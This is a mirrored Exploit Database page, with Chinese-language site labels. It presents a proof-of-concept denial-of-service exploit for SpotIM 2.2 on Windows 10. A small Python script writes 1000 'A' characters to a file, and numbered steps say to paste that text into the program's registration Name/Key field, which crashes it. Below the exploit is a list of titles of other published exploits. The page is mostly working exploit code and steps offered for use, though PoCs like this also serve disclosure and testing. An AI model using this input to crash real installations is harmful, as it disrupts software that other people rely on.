SpotIM 2.2 – Denial of Service (PoC)

Exploit Database
51 阅读

作者： Alejandra Sánchez

日期： 2019-05-10
类别：
- dos
平台：
- windows
来源：https://www.exploit-db.com/exploits/46821/

# -*- coding: utf-8 -*-
# Exploit Title: SpotIM 2.2 - 'Name/Key' Denial of Service (PoC)
# Date: 09/05/2019
# Author: Alejandra Sánchez
# Vendor Homepage: http://www.nsauditor.com
# Software Link http://www.nsauditor.com/downloads/spotim_setup.exe
# Version: 2.2
# Tested on: Windows 10

# Proof of Concept:
# 1.- Run the python script "SpotIM.py", it will create a new file "SpotIM.txt"
# 2.- Copy the text from the generated SpotIM.txt file to clipboard
# 3.- Open SpotIM
# 4.Select "Register" > "Enter Registration Code..."
# 5.- Paste clipboard in the Name/Key field 
# 6.- Click 'OK'
# 7.- Crashed

buffer = "\x41" * 1000
f = open ("SpotIM.txt", "w")
f.write(buffer)
f.close()

last Exploits
SpotIM 2.2 – Denial of Service (PoC)的更多信息

Microsoft Windows – TCP/IP Stack Reference Counter Integer Overflow (MS11-083)：
Native Instruments Kontakt 4 Player – ‘.NKI’ File Syntactic Analysis Buffer Overflow (PoC)：
NetSchedScan 1.0 – Crash (PoC)：
Novell Netware – NWFTPD.NLM DELE Remote Code Execution：
VMware Workstation 12 Pro – Denial of Service：
presto! pagemanager 9.01 – Multiple Vulnerabilities：
Barcodewiz BarCode ActiveX 3.29 – Denial of Service (PoC)：
TP-LINK TD-W8151N – Denial of Service：